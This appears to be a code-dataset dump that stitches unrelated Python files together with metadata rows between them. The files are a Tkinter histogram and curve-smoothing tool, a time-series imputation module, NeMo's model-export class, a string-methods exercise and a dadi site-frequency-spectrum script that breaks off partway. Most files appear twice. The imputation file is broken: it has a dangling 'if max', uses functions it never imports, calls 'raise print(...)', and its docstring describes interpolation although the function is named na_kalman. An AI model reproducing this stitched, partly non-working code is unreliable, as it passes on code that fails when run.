self.canvas.delete(b)
self.bars=[]
def drawHistogram(self):
"""This function draws histogram from list of pixel counts ,one for
each value in the source image"""
self.removeHistogram()
if self.histvar.get():
h=self.histvalues
if h==[]:
return
list_pixels_count=h
c=[]
maxc=max(list_pixels_count)
if maxc==0:
return
if list_pixels_count.index(maxc):
list_pixels_count.remove(maxc)
list_pixels_count.insert(255,0)
for i in list_pixels_count[:256]:
max_list=max(list_pixels_count)
if max_list==0:
return
val=i*200/max_list
c.append(val)
for i in range(0,len(c)):
x1=50+i
x2=50+i
y1=275-c[i]
y2=275
r=self.canvas.create_line([(x1,y1),(x2,y2)],fill="gray70",width=1)
self.bars.append(r)
#displaying line and ovals ontop
self.canvas.tkraise(self.curline)
for i in self.curovals:
self.canvas.tkraise(i)
if hasattr(self,"curoval"):
self.canvas.tkraise(self.curoval)
self.canvas.update()
##Update Histograms on Graphtool
#if self.update!=1:
# prev_option=self.optionType.get()
# self.optionType.set(2)
# self.update=1
# self.Update()
# self.optionType.set(prev_option)
# self.update=0
# return
################SMOOTHING CODE############################
def addcurve(self,out, xy, steps):
add = out.append
for i in range(1, steps+1):
t = float(i) / steps; t2 = t*t; t3 = t2*t
u = 1.0 - t; u2 = u*u; u3 = u2*u
add(xy[0]*u3 + 3*(xy[2]*t*u2 + xy[4]*t2*u) + xy[6]*t3)
add(xy[1]*u3 + 3*(xy[3]*t*u2 + xy[5]*t2*u) + xy[7]*t3)
def smooth(self,xy, steps=12):
if not xy:
return xy
closed = xy[0] == xy[-2] and xy[1] == xy[-1]
out = []
if closed:
# connect end segment to first segment
control = (
0.500*xy[-4] + 0.500*xy[0],
0.500*xy[-3] + 0.500*xy[1],
0.167*xy[-4] + 0.833*xy[0],
0.167*xy[-3] + 0.833*xy[1],
0.833*xy[0] + 0.167*xy[2],
0.833*xy[1] + 0.167*xy[3],
0.500*xy[0] + 0.500*xy[2],
0.500*xy[1] + 0.500*xy[3],
)
out = [control[0], control[1]]
self.addcurve(out, control, steps)
else:
out = [xy[0], xy[1]]
for i in range(0, len(xy)-4, 2):
if i == 0 and not closed:
control = (xy[i],xy[i+1],0.333*xy[i] + 0.667*xy[i+2],0.333*xy[i+1] + 0.667*xy[i+3],)
else:
control = (
0.500*xy[i] + 0.500*xy[i+2],
0.500*xy[i+1] + 0.500*xy[i+3],
0.167*xy[i] + 0.833*xy[i+2],
0.167*xy[i+1] + 0.833*xy[i+3],
)
if i == len(xy)-6 and not closed:
control = control + (
0.667*xy[i+2] + 0.333*xy[i+4],
0.667*xy[i+3] + 0.333*xy[i+5],
xy[i+4],
xy[i+5],
)
else:
control = control + (
0.833*xy[i+2] + 0.167*xy[i+4],
0.833*xy[i+3] + 0.167*xy[i+5],
0.500*xy[i+2] + 0.500*xy[i+4],
0.500*xy[i+3] + 0.500*xy[i+5],
)
if ((xy[i] == xy[i+2] and xy[i+1] == xy[i+3]) or
(xy[i+2] == xy[i+4] and xy[i+3] == xy[i+5])):
out.append(control[6])
out.append(control[7])
else:
self.addcurve(out, control, steps)
return out
|
en
| 0.647434
|
## Automatically adapted for numpy.oldnumeric Jul 23, 2007 by ############################################################################## # # # Authors: <NAME>,<NAME> # # ############################################################################### # # # # #$Id: graphtool.py,v 1.47 2007/12/04 21:28:04 vareille Exp $ #Graph Tool is a widget with movable graph curve #app=GraphApp(root) #app.caluculate_ramp() returns current ramp #from ViewerFramework.VFCommand import Command, CommandGUI # Initialization # Create Toolbar #Curve Type #tooltip #Drawing Graph Sheet #GRAY SCALE #grays.reverse() #bottom one #left one # now set the constructor options correctly using the configure method Appends last drag point to controlpoint list if not appended by mouseleave func. when clicked on any controlpoint removes control point and draws line with remaining control points. #not in [self.startpoint,self.endpoint]: #Limiting points not to cross #not in [self.startpoint,self.endpoint] : #finding out points around the selected point #making active clickrange to be ten points around clicked point Draws line,ovals with current controlpoints. ###Limiting xcoords of the current point not to cross adjacent points #Limit graph with in the axis #adding start,end points #adding current point to list #adding oldpoints to list #removing oval point that is on drag #if points that start with 50 or 51 or 305,304 other than start ,end #points exists remove start or end points #remove ovals #finding oval for start point and endpoint ###removing start point oval ###removing end point oval #drawing line ##Adding oval when start or end point in new1points #drawing ovals ######## convert coordinates to ramp################## #if self.continuous : #scale # make sure type is set first Set widget callback. Must be callable function. Callback is called every time the widget value is set/modified This function is for inverting graph by reverse computing controlpoints #self.oldpoints=[] ################################################### #Some times start and end points are not deleted #So for deleting them canvas.find_enclosed points at #startpoint and endpoint are caluculated(returns alist of #canvas objects present there) and if the coords of #any canvas objects matches with start or end point that gets deleted ##################################################### draws curve with default points This function deletes current line removes current ovals Resetting curve as slant line 0 to 255 #self.histvar.set(0) when stepBack button clicked previous step is displayed.History of all the steps done is remembered and when stepback clicked from history list previous step is shown and that step is removed from history list #deleting ################################################### #Some times start and end points are not deleted #So for deleting them canvas.find_enclosed points at #startpoint and endpoint are caluculated(returns alist of #canvas objects present there) and if the coords of #any canvas objects matches with start or end point that gets deleted ##################################################### #if no start or end points #if start or endpoints and points with (50or 51) or (305or305) fuction to get current control points of the curve function to set curve control points #draw Histogram removes Histograms This function draws histogram from list of pixel counts ,one for each value in the source image #displaying line and ovals ontop ##Update Histograms on Graphtool #if self.update!=1: # prev_option=self.optionType.get() # self.optionType.set(2) # self.update=1 # self.Update() # self.optionType.set(prev_option) # self.update=0 # return ################SMOOTHING CODE############################ # connect end segment to first segment
| 2.229406
| 2
|
imputeTSpy/kalman.py
|
zaenalium/imputeTSpy
| 0
|
6628512
|
<reponame>zaenalium/imputeTSpy<filename>imputeTSpy/kalman.py
from pykalman import KalmanFilter
import numpy as np
import pandas as pd
from check_data import check_data, consecutive
from tsAirgap import ts_airgap, ts_heating, ts_nh4
def na_kalman(data, option = "linear", maxgap = None) :
""" Missing Value Imputation by Interpolation
Uses linear, spline or stineman interpolation to replace missing values.
Parameters
----------
data: numpy.array, list or pandas.Series
Data to impute.
Returns
-------
numpy.array
Imputed data.
Examples
------
import imputeTSpy
data = imputeTSpy.ts_nh4()
data_fill_locf = imputeTSpy.locf(data)
data_fill_nocb = imputeTSpy.nocb(data)
"""
if max
x = check_data(data)
idx = np.arange(x.shape[0])
nan_idx = idx[np.isnan(x)]
if maxgap != None :
z = consecutive(nan_idx)
exc = []
for i in range(len(z)) :
if len(z[i]) > maxgap :
exc.extend(z[i])
nan_idx = nan_idx[np.isin(nan_idx, exc) == False]
else :
pass
if option == "linear" :
f = interp1d(idx[np.isin(idx, nan_idx) == False],
x[np.isin(idx, nan_idx) == False] )
intrep_val = f(idx)
elif option == "spline" :
f = interp1d(idx[np.isin(idx, nan_idx) == False],
x[np.isin(idx, nan_idx) == False], kind= "cubic" )
intrep_val = f(idx)
elif option == "stineman" :
intrep_val = stineman_interp(idx , idx[np.isin(idx, nan_idx) == False],
x[np.isin(idx, nan_idx) == False], yp = None)
else :
raise print("Please fill the valid option!!!")
x[nan_idx] = intrep_val[nan_idx]
return x
from pykalman import KalmanFilter
import numpy as np
import matplotlib.pyplot as plt
from numpy import ma
# enable or disable missing observations
use_mask = 1
# reading data (quick and dirty)
Time=[]
X=[]
for line in open('data/dataset_01.csv'):
f1, f2 = line.split(';')
Time.append(float(f1))
X.append(float(f2))
if (use_mask):
X = ma.asarray(X)
X[300:500] = ma.masked
# Filter Configuration
# time step
dt = Time[2] - Time[1]
# transition_matrix
F = [[1, dt, 0.5*dt*dt],
[0, 1, dt],
[0, 0, 1]]
# observation_matrix
H = [1, 0, 0]
# transition_covariance
Q = [[ 1, 0, 0],
[ 0, 1e-4, 0],
[ 0, 0, 1e-6]]
# observation_covariance
R = [0.04] # max error = 0.6m
# initial_state_mean
X0 = [0,
0,
0]
# initial_state_covariance
P0 = [[ 10, 0, 0],
[ 0, 1, 0],
[ 0, 0, 1]]
n_timesteps = len(Time)
n_dim_state = 3
filtered_state_means = np.zeros((n_timesteps, n_dim_state))
filtered_state_covariances = np.zeros((n_timesteps, n_dim_state, n_dim_state))
# Kalman-Filter initialization
kf = KalmanFilter(transition_matrices = F,
observation_matrices = H,
transition_covariance = Q,
observation_covariance = R,
initial_state_mean = X0,
initial_state_covariance = P0)
# iterative estimation for each new measurement
for t in range(n_timesteps):
if t == 0:
filtered_state_means[t] = X0
filtered_state_covariances[t] = P0
else:
filtered_state_means[t], filtered_state_covariances[t] = (
kf.filter_update(
filtered_state_means[t-1],
filtered_state_covariances[t-1],
observation = X[t])
)
position_sigma = np.sqrt(filtered_state_covariances[:, 0, 0]);
# plot of the resulted trajectory
plt.plot(Time, filtered_state_means[:, 0], "g-", label="Filtered position", markersize=1)
plt.plot(Time, filtered_state_means[:, 0] + position_sigma, "r--", label="+ sigma", markersize=1)
plt.plot(Time, filtered_state_means[:, 0] - position_sigma, "r--", label="- sigma", markersize=1)
plt.grid()
plt.legend(loc="upper left")
plt.xlabel("Time (s)")
plt.ylabel("Position (m)")
plt.show()
|
from pykalman import KalmanFilter
import numpy as np
import pandas as pd
from check_data import check_data, consecutive
from tsAirgap import ts_airgap, ts_heating, ts_nh4
def na_kalman(data, option = "linear", maxgap = None) :
""" Missing Value Imputation by Interpolation
Uses linear, spline or stineman interpolation to replace missing values.
Parameters
----------
data: numpy.array, list or pandas.Series
Data to impute.
Returns
-------
numpy.array
Imputed data.
Examples
------
import imputeTSpy
data = imputeTSpy.ts_nh4()
data_fill_locf = imputeTSpy.locf(data)
data_fill_nocb = imputeTSpy.nocb(data)
"""
if max
x = check_data(data)
idx = np.arange(x.shape[0])
nan_idx = idx[np.isnan(x)]
if maxgap != None :
z = consecutive(nan_idx)
exc = []
for i in range(len(z)) :
if len(z[i]) > maxgap :
exc.extend(z[i])
nan_idx = nan_idx[np.isin(nan_idx, exc) == False]
else :
pass
if option == "linear" :
f = interp1d(idx[np.isin(idx, nan_idx) == False],
x[np.isin(idx, nan_idx) == False] )
intrep_val = f(idx)
elif option == "spline" :
f = interp1d(idx[np.isin(idx, nan_idx) == False],
x[np.isin(idx, nan_idx) == False], kind= "cubic" )
intrep_val = f(idx)
elif option == "stineman" :
intrep_val = stineman_interp(idx , idx[np.isin(idx, nan_idx) == False],
x[np.isin(idx, nan_idx) == False], yp = None)
else :
raise print("Please fill the valid option!!!")
x[nan_idx] = intrep_val[nan_idx]
return x
from pykalman import KalmanFilter
import numpy as np
import matplotlib.pyplot as plt
from numpy import ma
# enable or disable missing observations
use_mask = 1
# reading data (quick and dirty)
Time=[]
X=[]
for line in open('data/dataset_01.csv'):
f1, f2 = line.split(';')
Time.append(float(f1))
X.append(float(f2))
if (use_mask):
X = ma.asarray(X)
X[300:500] = ma.masked
# Filter Configuration
# time step
dt = Time[2] - Time[1]
# transition_matrix
F = [[1, dt, 0.5*dt*dt],
[0, 1, dt],
[0, 0, 1]]
# observation_matrix
H = [1, 0, 0]
# transition_covariance
Q = [[ 1, 0, 0],
[ 0, 1e-4, 0],
[ 0, 0, 1e-6]]
# observation_covariance
R = [0.04] # max error = 0.6m
# initial_state_mean
X0 = [0,
0,
0]
# initial_state_covariance
P0 = [[ 10, 0, 0],
[ 0, 1, 0],
[ 0, 0, 1]]
n_timesteps = len(Time)
n_dim_state = 3
filtered_state_means = np.zeros((n_timesteps, n_dim_state))
filtered_state_covariances = np.zeros((n_timesteps, n_dim_state, n_dim_state))
# Kalman-Filter initialization
kf = KalmanFilter(transition_matrices = F,
observation_matrices = H,
transition_covariance = Q,
observation_covariance = R,
initial_state_mean = X0,
initial_state_covariance = P0)
# iterative estimation for each new measurement
for t in range(n_timesteps):
if t == 0:
filtered_state_means[t] = X0
filtered_state_covariances[t] = P0
else:
filtered_state_means[t], filtered_state_covariances[t] = (
kf.filter_update(
filtered_state_means[t-1],
filtered_state_covariances[t-1],
observation = X[t])
)
position_sigma = np.sqrt(filtered_state_covariances[:, 0, 0]);
# plot of the resulted trajectory
plt.plot(Time, filtered_state_means[:, 0], "g-", label="Filtered position", markersize=1)
plt.plot(Time, filtered_state_means[:, 0] + position_sigma, "r--", label="+ sigma", markersize=1)
plt.plot(Time, filtered_state_means[:, 0] - position_sigma, "r--", label="- sigma", markersize=1)
plt.grid()
plt.legend(loc="upper left")
plt.xlabel("Time (s)")
plt.ylabel("Position (m)")
plt.show()
|
en
| 0.442255
|
Missing Value Imputation by Interpolation Uses linear, spline or stineman interpolation to replace missing values. Parameters ---------- data: numpy.array, list or pandas.Series Data to impute. Returns ------- numpy.array Imputed data. Examples ------ import imputeTSpy data = imputeTSpy.ts_nh4() data_fill_locf = imputeTSpy.locf(data) data_fill_nocb = imputeTSpy.nocb(data) # enable or disable missing observations # reading data (quick and dirty) # Filter Configuration # time step # transition_matrix # observation_matrix # transition_covariance # observation_covariance # max error = 0.6m # initial_state_mean # initial_state_covariance # Kalman-Filter initialization # iterative estimation for each new measurement # plot of the resulted trajectory
| 2.955677
| 3
|
nemo/core/classes/exportable.py
|
hamjam/NeMo
| 1
|
6628513
|
<filename>nemo/core/classes/exportable.py
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from abc import ABC
import onnx
import torch
from torch.onnx import ExportTypes, TrainingMode
from nemo.core.classes import typecheck
from nemo.core.utils.neural_type_utils import get_dynamic_axes, get_io_names
from nemo.utils import logging
from nemo.utils.export_utils import (
ExportFormat,
augment_filename,
get_export_format,
parse_input_example,
replace_for_export,
verify_runtime,
wrap_forward_method,
)
__all__ = ['ExportFormat', 'Exportable']
class Exportable(ABC):
"""
This Interface should be implemented by particular classes derived from nemo.core.NeuralModule or nemo.core.ModelPT.
It gives these entities ability to be exported for deployment to formats such as ONNX.
"""
@property
def input_module(self):
return self
@property
def output_module(self):
return self
def export(
self,
output: str,
input_example=None,
verbose=False,
export_params=True,
do_constant_folding=True,
onnx_opset_version=None,
try_script: bool = False,
training=TrainingMode.EVAL,
check_trace: bool = False,
use_dynamic_axes: bool = True,
dynamic_axes=None,
check_tolerance=0.01,
):
my_args = locals().copy()
my_args.pop('self')
exportables = []
for m in self.modules():
if isinstance(m, Exportable):
exportables.append(m)
qual_name = self.__module__ + '.' + self.__class__.__qualname__
format = get_export_format(output)
output_descr = f"{qual_name} exported to {format}"
# Pytorch's default for None is too low, can't pass None through
if onnx_opset_version is None:
onnx_opset_version = 13
try:
# Disable typechecks
typecheck.set_typecheck_enabled(enabled=False)
# Allow user to completely override forward method to export
forward_method, old_forward_method = wrap_forward_method(self)
# Set module mode
with torch.onnx.select_model_mode_for_export(
self, training
), torch.inference_mode(), torch.jit.optimized_execution(True):
if input_example is None:
input_example = self.input_module.input_example()
# Remove i/o examples from args we propagate to enclosed Exportables
my_args.pop('output')
my_args.pop('input_example')
# Run (posibly overridden) prepare methods before calling forward()
for ex in exportables:
ex._prepare_for_export(**my_args, noreplace=True)
self._prepare_for_export(output=output, input_example=input_example, **my_args)
input_list, input_dict = parse_input_example(input_example)
input_names = self.input_names
output_names = self.output_names
output_example = tuple(self.forward(*input_list, **input_dict))
jitted_model = None
if try_script:
try:
jitted_model = torch.jit.script(self)
except Exception as e:
logging.error(f"jit.script() failed!\{e}")
if format == ExportFormat.TORCHSCRIPT:
if jitted_model is None:
jitted_model = torch.jit.trace_module(
self,
{"forward": tuple(input_list) + tuple(input_dict.values())},
strict=True,
check_trace=check_trace,
check_tolerance=check_tolerance,
)
if not self.training:
jitted_model = torch.jit.optimize_for_inference(jitted_model)
if verbose:
logging.info(f"JIT code:\n{jitted_model.code}")
jitted_model.save(output)
assert os.path.exists(output)
elif format == ExportFormat.ONNX:
if jitted_model is None:
jitted_model = self
# dynamic axis is a mapping from input/output_name => list of "dynamic" indices
if dynamic_axes is None and use_dynamic_axes:
dynamic_axes = get_dynamic_axes(self.input_module.input_types, input_names)
dynamic_axes.update(get_dynamic_axes(self.output_module.output_types, output_names))
torch.onnx.export(
jitted_model,
input_example,
output,
input_names=input_names,
output_names=output_names,
verbose=verbose,
export_params=export_params,
do_constant_folding=do_constant_folding,
dynamic_axes=dynamic_axes,
opset_version=onnx_opset_version,
)
if check_trace:
verify_runtime(output, input_list, input_dict, input_names, output_names, output_example)
else:
raise ValueError(f'Encountered unknown export format {format}.')
finally:
typecheck.set_typecheck_enabled(enabled=True)
if forward_method:
type(self).forward = old_forward_method
self._export_teardown()
return ([output], [output_descr])
@property
def disabled_deployment_input_names(self):
"""Implement this method to return a set of input names disabled for export"""
return set()
@property
def disabled_deployment_output_names(self):
"""Implement this method to return a set of output names disabled for export"""
return set()
@property
def supported_export_formats(self):
"""Implement this method to return a set of export formats supported. Default is all types."""
return set([ExportFormat.ONNX, ExportFormat.TORCHSCRIPT])
def _prepare_for_export(self, **kwargs):
"""
Override this method to prepare module for export. This is in-place operation.
Base version does common necessary module replacements (Apex etc)
"""
if not 'noreplace' in kwargs:
replace_for_export(self)
def _export_teardown(self):
"""
Override this method for any teardown code after export.
"""
pass
@property
def input_names(self):
return get_io_names(self.input_module.input_types, self.disabled_deployment_input_names)
@property
def output_names(self):
return get_io_names(self.output_module.output_types, self.disabled_deployment_output_names)
|
<filename>nemo/core/classes/exportable.py
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from abc import ABC
import onnx
import torch
from torch.onnx import ExportTypes, TrainingMode
from nemo.core.classes import typecheck
from nemo.core.utils.neural_type_utils import get_dynamic_axes, get_io_names
from nemo.utils import logging
from nemo.utils.export_utils import (
ExportFormat,
augment_filename,
get_export_format,
parse_input_example,
replace_for_export,
verify_runtime,
wrap_forward_method,
)
__all__ = ['ExportFormat', 'Exportable']
class Exportable(ABC):
"""
This Interface should be implemented by particular classes derived from nemo.core.NeuralModule or nemo.core.ModelPT.
It gives these entities ability to be exported for deployment to formats such as ONNX.
"""
@property
def input_module(self):
return self
@property
def output_module(self):
return self
def export(
self,
output: str,
input_example=None,
verbose=False,
export_params=True,
do_constant_folding=True,
onnx_opset_version=None,
try_script: bool = False,
training=TrainingMode.EVAL,
check_trace: bool = False,
use_dynamic_axes: bool = True,
dynamic_axes=None,
check_tolerance=0.01,
):
my_args = locals().copy()
my_args.pop('self')
exportables = []
for m in self.modules():
if isinstance(m, Exportable):
exportables.append(m)
qual_name = self.__module__ + '.' + self.__class__.__qualname__
format = get_export_format(output)
output_descr = f"{qual_name} exported to {format}"
# Pytorch's default for None is too low, can't pass None through
if onnx_opset_version is None:
onnx_opset_version = 13
try:
# Disable typechecks
typecheck.set_typecheck_enabled(enabled=False)
# Allow user to completely override forward method to export
forward_method, old_forward_method = wrap_forward_method(self)
# Set module mode
with torch.onnx.select_model_mode_for_export(
self, training
), torch.inference_mode(), torch.jit.optimized_execution(True):
if input_example is None:
input_example = self.input_module.input_example()
# Remove i/o examples from args we propagate to enclosed Exportables
my_args.pop('output')
my_args.pop('input_example')
# Run (posibly overridden) prepare methods before calling forward()
for ex in exportables:
ex._prepare_for_export(**my_args, noreplace=True)
self._prepare_for_export(output=output, input_example=input_example, **my_args)
input_list, input_dict = parse_input_example(input_example)
input_names = self.input_names
output_names = self.output_names
output_example = tuple(self.forward(*input_list, **input_dict))
jitted_model = None
if try_script:
try:
jitted_model = torch.jit.script(self)
except Exception as e:
logging.error(f"jit.script() failed!\{e}")
if format == ExportFormat.TORCHSCRIPT:
if jitted_model is None:
jitted_model = torch.jit.trace_module(
self,
{"forward": tuple(input_list) + tuple(input_dict.values())},
strict=True,
check_trace=check_trace,
check_tolerance=check_tolerance,
)
if not self.training:
jitted_model = torch.jit.optimize_for_inference(jitted_model)
if verbose:
logging.info(f"JIT code:\n{jitted_model.code}")
jitted_model.save(output)
assert os.path.exists(output)
elif format == ExportFormat.ONNX:
if jitted_model is None:
jitted_model = self
# dynamic axis is a mapping from input/output_name => list of "dynamic" indices
if dynamic_axes is None and use_dynamic_axes:
dynamic_axes = get_dynamic_axes(self.input_module.input_types, input_names)
dynamic_axes.update(get_dynamic_axes(self.output_module.output_types, output_names))
torch.onnx.export(
jitted_model,
input_example,
output,
input_names=input_names,
output_names=output_names,
verbose=verbose,
export_params=export_params,
do_constant_folding=do_constant_folding,
dynamic_axes=dynamic_axes,
opset_version=onnx_opset_version,
)
if check_trace:
verify_runtime(output, input_list, input_dict, input_names, output_names, output_example)
else:
raise ValueError(f'Encountered unknown export format {format}.')
finally:
typecheck.set_typecheck_enabled(enabled=True)
if forward_method:
type(self).forward = old_forward_method
self._export_teardown()
return ([output], [output_descr])
@property
def disabled_deployment_input_names(self):
"""Implement this method to return a set of input names disabled for export"""
return set()
@property
def disabled_deployment_output_names(self):
"""Implement this method to return a set of output names disabled for export"""
return set()
@property
def supported_export_formats(self):
"""Implement this method to return a set of export formats supported. Default is all types."""
return set([ExportFormat.ONNX, ExportFormat.TORCHSCRIPT])
def _prepare_for_export(self, **kwargs):
"""
Override this method to prepare module for export. This is in-place operation.
Base version does common necessary module replacements (Apex etc)
"""
if not 'noreplace' in kwargs:
replace_for_export(self)
def _export_teardown(self):
"""
Override this method for any teardown code after export.
"""
pass
@property
def input_names(self):
return get_io_names(self.input_module.input_types, self.disabled_deployment_input_names)
@property
def output_names(self):
return get_io_names(self.output_module.output_types, self.disabled_deployment_output_names)
|
en
| 0.844568
|
# Copyright (c) 2020, NVIDIA CORPORATION. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. This Interface should be implemented by particular classes derived from nemo.core.NeuralModule or nemo.core.ModelPT. It gives these entities ability to be exported for deployment to formats such as ONNX. # Pytorch's default for None is too low, can't pass None through # Disable typechecks # Allow user to completely override forward method to export # Set module mode # Remove i/o examples from args we propagate to enclosed Exportables # Run (posibly overridden) prepare methods before calling forward() # dynamic axis is a mapping from input/output_name => list of "dynamic" indices Implement this method to return a set of input names disabled for export Implement this method to return a set of output names disabled for export Implement this method to return a set of export formats supported. Default is all types. Override this method to prepare module for export. This is in-place operation. Base version does common necessary module replacements (Apex etc) Override this method for any teardown code after export.
| 2.262301
| 2
|
3- Strings/string-methods.py
|
WildGenie/Python-for-ML-
| 7
|
6628514
|
msg = "Python Kursumuza Ho<NAME>iniz. <NAME> TEKE"
# sonuc = msg.upper()
# sonuc = msg.lower()
# sonuc = msg.title()
# sonuc = msg.capitalize()
# sonuc = "abc".islower()
# sonuc = " abc ".strip()
# sonuc = msg.split()
# sonuc = msg.split('.')
# sonuc = "-".join(sonuc)
# index = msg.index('Hoş')
# sonuc = msg.startswith('A')
# sonuc = msg.endswith('n')
sonuc = msg.replace('TEKE','Orkun')
sonuc = msg.lower().replace(' ','-').replace('ş','s').replace('.','').replace('ı','i')
print(sonuc)
|
msg = "Python Kursumuza Ho<NAME>iniz. <NAME> TEKE"
# sonuc = msg.upper()
# sonuc = msg.lower()
# sonuc = msg.title()
# sonuc = msg.capitalize()
# sonuc = "abc".islower()
# sonuc = " abc ".strip()
# sonuc = msg.split()
# sonuc = msg.split('.')
# sonuc = "-".join(sonuc)
# index = msg.index('Hoş')
# sonuc = msg.startswith('A')
# sonuc = msg.endswith('n')
sonuc = msg.replace('TEKE','Orkun')
sonuc = msg.lower().replace(' ','-').replace('ş','s').replace('.','').replace('ı','i')
print(sonuc)
|
tr
| 0.241998
|
# sonuc = msg.upper() # sonuc = msg.lower() # sonuc = msg.title() # sonuc = msg.capitalize() # sonuc = "abc".islower() # sonuc = " abc ".strip() # sonuc = msg.split() # sonuc = msg.split('.') # sonuc = "-".join(sonuc) # index = msg.index('Hoş') # sonuc = msg.startswith('A') # sonuc = msg.endswith('n')
| 3.271677
| 3
|
scripts/run_generate_sfs_segments.py
|
quanc1989/SV-ONT-Tibetan
| 7
|
6628515
|
<gh_stars>1-10
import json
import math
import os
import random
import configargparse
import dadi
def config_opts():
parser = configargparse.ArgumentParser(
description='run_convert_vcf_to_dadi.py',
config_file_parser_class=configargparse.YAMLConfigFileParser,
formatter_class=configargparse.ArgumentDefaultsHelpFormatter)
parser.add('-d', '--data', required=True,
help='datadict file')
parser.add('-p', '--prefix', required=True,
help='save prefix')
parser.add('-l', '--poplist', required=True,
help='population string')
parser.add('--projections', required=True,
help='projections down, same size to poplist')
parser.add('-w', '--window', type=int, required=False,
help='window width')
parser.add('-u', '--unfold', required=False, action='store_true', default= False,
help='whether it is unfold')
parser.add('-r', '--random', required=False, action='store_true', default= False,
help='generate random bootstrap sets')
return parser
if __name__ == '__main__':
parser = config_opts()
opt = parser.parse_args()
datadict = {}
total_variants_chrom = {}
with open(opt.data, 'r') as file_read:
lines = file_read.read().strip().split('\n')
# limit_variants = 10000
# index_variant = 0
for line in lines:
# print(line)
key_line = line.split('{')[0]
val_line = line[line.index('{'):]
# print(key_line,'--',val_line)
info = key_line.split('-')
chrom = info[0]
pos = int(info[1])
if chrom not in datadict:
datadict[chrom] = {}
total_variants_chrom[chrom] = 0
if opt.window:
order_pos = int(pos / opt.window)
if order_pos not in datadict[chrom]:
datadict[chrom][order_pos] = {}
datadict[chrom][order_pos][key_line] = json.loads(val_line.replace("\'", "\"").replace("(", "[").replace(")", "]"))
else:
datadict[chrom][key_line] = json.loads(val_line.replace("\'", "\"").replace("(", "[").replace(")", "]"))
total_variants_chrom[chrom] += 1
if not os.path.exists(opt.prefix):
os.makedirs(opt.prefix)
# list_pops = ['TIB', 'HANN', 'HANS']
list_pops = [x.strip() for x in opt.poplist.split(',')]
list_pojections = [int(x.strip()) for x in opt.projections.split(',')]
if not opt.window: datadict_bootstrap={}
with open(os.path.join(opt.prefix, 'generate_sfs_segments.log'), 'w') as file_write:
for chrom in datadict:
if opt.window:
print('Simulation #%s start' % chrom)
for order_pos in datadict[chrom]:
fs = dadi.Spectrum.from_data_dict(data_dict=datadict[chrom][order_pos],
pop_ids=list_pops,
projections=list_pojections,
polarized=opt.unfold)
if not os.path.exists(os.path.join(opt.prefix, chrom)):
os.makedirs(os.path.join(opt.prefix, chrom))
fs.to_file(os.path.join(opt.prefix, chrom, chrom + '-' + str(order_pos) + '.fs'))
file_write.writelines('%s\t%d\t%d\n' %(chrom, order_pos, len(datadict[chrom][order_pos])))
else:
window = total_variants_chrom[chrom]/100
list_keys = list(datadict[chrom].keys())
if opt.random:
random.shuffle(list_keys)
index_variant = 0
for key_variant in list_keys:
# pos = int(key_line.split('-')[1])
index_variant += 1
order_pos = math.floor(index_variant / window)
if order_pos not in datadict_bootstrap:
datadict_bootstrap[order_pos] = {}
# print(key_variant,'--',datadict[chrom][key_variant],'--',str(order_pos))
datadict_bootstrap[order_pos][key_variant] = datadict[chrom][key_variant]
if not opt.window:
index_bootstrap = 0
list_keys = list(datadict_bootstrap.keys())
while index_bootstrap < 100:
index_bootstrap += 1
print('Bootstrap #%d start' % index_bootstrap)
list_keys_bootstrap = random.choices(list_keys, k=100)
set_keys_bootstrap = set(list_keys_bootstrap)
dict_to_spectrum = {}
for order_pos in set_keys_bootstrap:
group_order_pos = list_keys_bootstrap.count(order_pos)
for index_group in range(group_order_pos):
for key_variant in datadict_bootstrap[order_pos]:
dict_to_spectrum[key_variant + '-' + str(index_group)] = datadict_bootstrap[order_pos][key_variant]
with open(os.path.join(opt.prefix, "datadict."+str(index_bootstrap)+".txt"), 'w') as outfile:
for x, y in dict_to_spectrum.items():
outfile.write(x + str(y) + "\n")
fs = dadi.Spectrum.from_data_dict(data_dict=dict_to_spectrum,
pop_ids=list_pops,
projections=list_pojections,
polarized=opt.unfold)
fs.to_file(os.path.join(opt.prefix, str(index_bootstrap) + '.fs'))
file_write.writelines('%d\t%d\n' %(index_bootstrap, len(dict_to_spectrum)))
print(str(len(dict_to_spectrum)))
|
import json
import math
import os
import random
import configargparse
import dadi
def config_opts():
parser = configargparse.ArgumentParser(
description='run_convert_vcf_to_dadi.py',
config_file_parser_class=configargparse.YAMLConfigFileParser,
formatter_class=configargparse.ArgumentDefaultsHelpFormatter)
parser.add('-d', '--data', required=True,
help='datadict file')
parser.add('-p', '--prefix', required=True,
help='save prefix')
parser.add('-l', '--poplist', required=True,
help='population string')
parser.add('--projections', required=True,
help='projections down, same size to poplist')
parser.add('-w', '--window', type=int, required=False,
help='window width')
parser.add('-u', '--unfold', required=False, action='store_true', default= False,
help='whether it is unfold')
parser.add('-r', '--random', required=False, action='store_true', default= False,
help='generate random bootstrap sets')
return parser
if __name__ == '__main__':
parser = config_opts()
opt = parser.parse_args()
datadict = {}
total_variants_chrom = {}
with open(opt.data, 'r') as file_read:
lines = file_read.read().strip().split('\n')
# limit_variants = 10000
# index_variant = 0
for line in lines:
# print(line)
key_line = line.split('{')[0]
val_line = line[line.index('{'):]
# print(key_line,'--',val_line)
info = key_line.split('-')
chrom = info[0]
pos = int(info[1])
if chrom not in datadict:
datadict[chrom] = {}
total_variants_chrom[chrom] = 0
if opt.window:
order_pos = int(pos / opt.window)
if order_pos not in datadict[chrom]:
